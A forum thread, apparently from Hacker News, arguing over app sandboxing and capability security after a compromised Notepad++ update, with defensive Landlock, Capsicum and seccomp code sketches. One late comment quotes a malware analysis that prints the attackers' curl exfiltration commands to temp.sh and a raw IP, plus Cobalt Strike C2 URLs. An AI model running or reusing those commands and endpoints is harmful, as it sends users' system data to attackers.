macOS has been getting a lot of flak recently for its UI (deservedly), but I honestly feel it's the closest to getting granular app permissions right.
Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end-user applications, it will just end up entirely centralised with the big tech companies, as it already is with Apple on iOS and macOS.
I knock on your door.
You invite me to sit with you in your living room.
I can't easily sneak into your bedroom. Further, my temporary access ends as soon as I leave your house.
The same should happen with apps.
When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.
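On Linux you can already get surprisingly close to this with Landlock (kernel 5.13+). A minimal, purely illustrative sketch with error handling omitted: a tiny wrapper confines itself to one directory (plus read-only /usr so libraries still load), then execs the editor, and the restriction is inherited by the editor and dies with the process tree. The wrapper name and usage are made up for illustration.

    // Minimal, illustrative wrapper: confine this process (and anything it
    // execs) to one directory, then launch the editor. Assumes Linux >= 5.13
    // with Landlock enabled; all error handling omitted for brevity.
    #include <fcntl.h>
    #include <linux/landlock.h>
    #include <sys/prctl.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    int main(int argc, char *argv[]) {
        // usage (hypothetical): ./confine dir1 notepad dir1/file1.txt
        struct landlock_ruleset_attr attr = {
            .handled_access_fs = LANDLOCK_ACCESS_FS_READ_FILE |
                                 LANDLOCK_ACCESS_FS_WRITE_FILE |
                                 LANDLOCK_ACCESS_FS_READ_DIR,
        };
        int ruleset = syscall(SYS_landlock_create_ruleset, &attr, sizeof(attr), 0);

        // Allow read/write beneath the one directory given on the command line.
        struct landlock_path_beneath_attr rw = {
            .allowed_access = attr.handled_access_fs,
            .parent_fd = open(argv[1], O_PATH | O_CLOEXEC),
        };
        syscall(SYS_landlock_add_rule, ruleset, LANDLOCK_RULE_PATH_BENEATH, &rw, 0);

        // The editor still needs to load its libraries: read-only /usr.
        // A real tool would also cover /lib, /etc, fonts, and so on.
        struct landlock_path_beneath_attr ro = {
            .allowed_access = LANDLOCK_ACCESS_FS_READ_FILE | LANDLOCK_ACCESS_FS_READ_DIR,
            .parent_fd = open("/usr", O_PATH | O_CLOEXEC),
        };
        syscall(SYS_landlock_add_rule, ruleset, LANDLOCK_RULE_PATH_BENEATH, &ro, 0);

        prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);           // required before restricting
        syscall(SYS_landlock_restrict_self, ruleset, 0);  // everything else is denied

        // The restriction is inherited across exec and ends when the processes exit.
        execvp(argv[2], &argv[2]);
        return 1;
    }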
A better example would be requiring the mailman to obtain written permission to step on your property every day. Convenience trumps maximal security for most people.
> When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2.
What happens if the user presses ^O, expecting a file-open dialog that can navigate to other directories? Would the dialog somehow be integrated into the OS and run with higher permissions, with notepad then being granted permission to the other directory the user selects?
Pretty sure that's how it works on iOS. The app can only access its own sandboxed directory. If it wants anything else, it has to use a system-provided file picker that returns a security-scoped URL for the selected file.
Because security people often don't understand the balance between security and usability, and we end up with software that is crippled and annoying to use.
I think we could get a lot further if we implement proper capability based security. Meaning that the authority to perform actions follows the objects around. I think that is how we get powerful tools and freedom, but still address the security issues and actually achieve the principle of least privilege.
For FreeBSD there is Capsicum, but it seems a bit inflexible to me. I would love to see more experiments with this on Linux and the BSDs.
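For reference, this is roughly what the Capsicum model looks like in practice; a minimal sketch, not production code: open what you need up front, attenuate the descriptor's rights, then enter capability mode, after which the process can no longer reach into the global namespace.

    // FreeBSD Capsicum sketch: open the one file we need, attenuate the
    // descriptor to read-only, then enter capability mode. After cap_enter()
    // the process can no longer open arbitrary paths, create sockets, etc.;
    // it can only use the capabilities (descriptors) it already holds.
    #include <sys/capsicum.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void) {
        int fd = open("dir1/file1.txt", O_RDONLY);

        cap_rights_t rights;
        cap_rights_init(&rights, CAP_READ, CAP_SEEK);
        cap_rights_limit(fd, &rights);  // this descriptor can now only be read/seeked

        cap_enter();                    // from here on, no new global namespace access

        char buf[4096];
        ssize_t n = read(fd, buf, sizeof(buf));            // still works
        // open("dir2/file2.txt", O_RDONLY) would now fail with ECAPMODE
        printf("read %zd bytes\n", n);
        return 0;
    }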
FreeBSD used to have an ELF target called "CloudABI" which used Capsicum by default.
Parameters to a CloudABI program were passed in a YAML file to a launcher that acquired what was in practice the program's "entitlements"/"app permissions" as capabilities that it passed to the program when it started.
I had been thinking of a way to avoid the CloudABI launcher.
The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths.
I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.
However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)
A capability model wouldn't have prevented the compromised binary from being installed, but it would totally prevent that compromised binary from being able to read or write to any specific file (or any other system resource) that Notepad++ wouldn't have ordinarily had access to.
The original model of computer security is "anything running on the machine can do and touch anything it wants to".
A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.
But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model, which only talks about what a process can do (the verbs of the system), a capability involves talking about what a process can perform an operation on (the nouns of the system). A "capability" is an unforgeable token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.
Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are unforgeable, the only way a process could possibly have gotten permission to operate on a resource is if some other process delegated that permission to it. And when delegating, a process can further attenuate a capability, e.g. by turning it from read/write into read-only, or it can give up a capability entirely and pass ownership to the other process.
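The closest everyday analogue on stock Unix is passing file descriptors over a socket: the receiver can use exactly the handle it was handed (here, one opened read-only, i.e. already attenuated) and nothing else. A rough sketch of that delegation pattern, not tied to any particular capability OS:

    // Sketch of capability-style delegation on stock Unix: the parent opens a
    // file read-only and hands just that descriptor to another process over a
    // socketpair via SCM_RIGHTS. The receiver holds no path and no broader
    // permission, and it cannot "upgrade" the descriptor to read/write.
    #include <fcntl.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <sys/uio.h>
    #include <unistd.h>

    // Send one file descriptor over a Unix-domain socket.
    static void send_fd(int sock, int fd) {
        char byte = 0;
        struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
        union {
            char buf[CMSG_SPACE(sizeof(int))];
            struct cmsghdr align;   // ensures proper alignment of the buffer
        } ctrl;
        struct msghdr msg = {
            .msg_iov = &iov, .msg_iovlen = 1,
            .msg_control = ctrl.buf, .msg_controllen = sizeof(ctrl.buf),
        };
        struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
        cmsg->cmsg_level = SOL_SOCKET;
        cmsg->cmsg_type = SCM_RIGHTS;
        cmsg->cmsg_len = CMSG_LEN(sizeof(int));
        memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
        sendmsg(sock, &msg, 0);
    }

    int main(void) {
        int sv[2];
        socketpair(AF_UNIX, SOCK_STREAM, 0, sv);

        // Attenuated delegation: read-only, regardless of what we could do.
        int fd = open("dir1/file1.txt", O_RDONLY);
        send_fd(sv[0], fd);
        // A sandboxed child holding sv[1] would receive the descriptor with
        // recvmsg() and could read this one file, but nothing else in dir1 or dir2.
        return 0;
    }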
Yet we look at phones, and we see people accepting outrageous permissions for many apps: they might rely on snooping on you for ads, or anything else, and yet the apps sell and have no problem staying in the stores.
So when it's all said and done, I do not expect practical levels of actual isolation to be that great.
> Yet we look at phones, and we see people accepting outrageous permissions for many apps
The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.
It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.
In the case of iOS, the choice was to use the app with those permissions or without them, so of course people prefer to not opt-in - why would they?
But when the choice is between using the app with such spyware in it, or not using it at all, people do accept the outrageous permissions the spyware needs.
For all its other problems, App Store review prevents a lot of this: you have to explain why your app needs entitlements A, B and C, and they will reject your update if they don't think your explanation is good enough. It's not a perfect system, but iOS applications don't actually do all that much snooping.
It's truly perverse that, at the same time that desktop systems are trying to lock down what trusted, conventional native apps can and cannot do or access, the Chrome team is pushing proposals to expand what browsers let websites do to the user's file system, like silently and arbitrarily reading and writing to the user's disk. That is gated only behind an "Are you sure you want to allow this? Y/N"-style dialog that, for extremely good reasons, anyone with any sense about design and interaction has strongly opposed for the last 20+ years.
I assumed the primary feature of Flatpak was to provide a "universal" package that works across all Linux distributions, with the security side of things as a secondary consideration. It sounds like the security aspect is now a much higher priority.
Many Flatpak apps require unnecessarily broad permissions. Unlike Android and iOS apps, they weren't designed for environments with limited permissions.
The XDG portal standards being developed to grant permissions to apps (and let users manage them), including apps installed via Flatpak, will continue to be useful if and when the sandboxing security of Flatpaks is improved. (In fact, having the frontend management part in place is something of a prerequisite to really enforcing restrictions on apps, lest they just stop working suddenly.)
I intensely hate that a stupid application can modify .bashrc and permanently persist itself.
Sure, in theory, SELinux could prevent this. But it seems like an uphill battle if my policies conflict with the distro's. I'd also have to "absorb" their policies' mental model first…
I tend to think things like .bashrc or .zshrc are bad ideas anyways. Not that you asked but I think the simpler solution is to have those files be owned by root and not writable by the user. You're probably not modifying them that often anyways.
> Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps.
Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.
As for plain development, sadly, the OS developers are simply ignoring the people asking. See:
I'm sure that will contribute to the illusion of security, but in reality the system is thoroughly backdoored on every level from the CPU on up, and everyone knows it.
There is no such thing as computer security, in general, at this point in history.
There's a subtlety that's missing here: if your threat model doesn't include the actors who can access those backdoors, then computer security isn't so bad these days.
That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.
The backdoors snuck in because literally everyone is being targeted.
Few people ever see the impact of that themselves or understand the chain of events that brought those impacts about.
And yet, many people perceive a difference between “getting hacked” and “not getting hacked” and believe that certain precautions materially affect whether or not they end up having to deal with a hacking event.
Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?
I'm sure you're right; however, there is still a distinction between the state using my device against me and unaffiliated or foreign states using my device against me or more likely simply to generate cash for themselves.
I almost feel like this should just be the default for all applications. I don't need them to escape out of a defined root. It's almost like your documents and application are effectively locked together. You have to grant permission for an app to access data from outside the sandbox.
Linux has this capability, of course. And macOS seems to prompt me a lot with "such and such application wants to access this or that". But I think it could be a lot more fine-grained, personally.
I've been arguing for this for years. There's no reason every random binary should have unfettered, invisible access to everything on my computer as if it were me.
iOS and Android both implement these security policies correctly. Why can't desktop operating systems?
The short answer is tech debt. The major mobile OSes got to build a new third-party software platform from day zero in the late 2000s, one which focused on and enforced priorities like power consumption and application sandboxing from the get-go.
The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.
The major desktop OSes are to some degree moving in this direction now (note the ever-increasing number of security prompts when opening "things" on macOS), but absent a clean-sheet approach that abandons all previous third-party software, as the mobile OSes could, this arguably can't happen overnight.
Mobile platforms are entirely useless to me for exactly this reason: individual islands that don't interact to make anything more generally useful. I would never use an OS that worked like that; it's for toys and disposable software only, imo.
Mobile platforms are far more secure than desktop computing software. I'd rather do internet banking on my phone than on my computer. You should too.
We can make operating systems where the islands can interact. It just needs to be opt-in instead of opt-out. A bad Notepad++ update shouldn't be able to invisibly read all of Thunderbird's stored emails, add backdoors to projects I'm working on, or cryptolocker my documents. At least not without my say-so.
I get that permission prompts are annoying. There are ways to handle the UI better, like having the open-file dialog automatically pass along permission to the opened file. But these are the minority of cases. Most programs only need access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. It would still allow all the software we use today, but block a great many of these attacks.
Both are true, and both should be allowed to exist as they serve different purposes.
Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as it's intended for end users and would degrade quality cumulatively. In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
It would be unfortunate to see that nuance missed; just because a system isn't 'new' doesn't mean it needs to be scrapped.
> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.
Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do the DAWs that sound engineers use run VST plugins in a sandbox, or do they just dyld + call? I bet most of the time it's the latter. And look at this Notepad++ attack: it would have been stopped dead if the update process had validated digital signatures. But no, that was too hard, so instead their users' computers got hacked.
I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.
A middle ground (maybe even closer to more limited OS design principles) exists. It is not just for toys. Otherwise neither UWP on Windows, nor Flatpak, nor Firejail would exist, nor would systemd implement containerization features.
In such a scenario, you can launch your IDE from your application manager and then give it write access only to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager or your terminal app, which are "special" and need to be approved by you once (or after each update). You may think, "How do I even share my secrets, like Git SSH keys?" Well, that's why we need services like the SSH agent or the freedesktop.org secret storage spec. Windows already has this, by the way, as its credential vaults; they have been there since at least Windows 7, maybe even Vista.
If a sandbox is optional then it is not really a good sandbox
Naturally, even Flatpak on Linux suffers from this, as legacy software simply doesn't have a concept of permission models, and this cannot be bolted on after the fact.
The containers are literally the "bolting on". You need to give the illusion that the software is running under a full OS, but you can actually mount the system directories as read-only.
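That read-only illusion is mostly just bind mounts. A heavily simplified sketch of what tools like Bubblewrap do under the hood (the /sandbox path is made up for illustration; it assumes mount privileges, e.g. inside a user namespace, and real sandboxes also handle pivot_root, /proc, /dev, and privilege dropping):

    // Heavily simplified: give this process its own mount namespace and expose
    // the host's /usr read-only under a (made-up) /sandbox root. All error
    // handling omitted.
    #define _GNU_SOURCE
    #include <sched.h>
    #include <sys/mount.h>

    int main(void) {
        unshare(CLONE_NEWNS);                                // private mount namespace
        mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL);   // don't leak mounts to the host

        // Bind the host /usr into the sandbox, then remount that bind read-only.
        mount("/usr", "/sandbox/usr", NULL, MS_BIND | MS_REC, NULL);
        mount(NULL, "/sandbox/usr", NULL, MS_REMOUNT | MS_BIND | MS_RDONLY, NULL);

        // A real tool would now pivot_root into /sandbox and exec the application,
        // which sees the system directories but cannot write to them.
        return 0;
    }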
And you still need to mount volumes and punch all sorts of holes in the sandbox for applications to work correctly and/or be useful.
Try running GIMP inside a container, for example: you'll have to give it access to your ~/Pictures or whatever for it to be useful.
Compare that with some photo-editing applications on Android/iOS, which can work without filesystem access by getting the file through the OS file picker.
Running apps in a sandbox is fine, but remember to disable internet access. A text editor should not require it, and it can be used to exfiltrate the text(s) you're editing.
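One blunt way to approximate that on Linux, sketched here with libseccomp (a real sandbox would more likely use a network namespace or Landlock's newer network rules, but the idea is the same): install a filter that refuses new sockets, then exec the editor; the filter is inherited across exec. The wrapper name and editor are made up for illustration.

    // Sketch: refuse creation of new sockets for this process and everything it
    // execs, then launch the editor. Uses libseccomp (build with -lseccomp).
    #include <errno.h>
    #include <seccomp.h>
    #include <unistd.h>

    int main(int argc, char *argv[]) {
        scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);    // allow everything...
        seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM),           // ...except socket()
                         SCMP_SYS(socket), 0);
        seccomp_load(ctx);

        execvp(argv[1], &argv[1]);   // e.g. (hypothetical) ./no-net nano notes.txt
        return 1;
    }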
When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:
3. Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
4. Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202
--
The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
--
The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin
Not what the OP is referring to, but UWP and its successor app models were always sandboxed, from Windows 8 onwards. This was derived from the Windows Phone model, which in turn was emulating the Android/iOS app model.
There is no reason for a tool to implicitly have access to my mounted cloud drive directory and browser cookie data.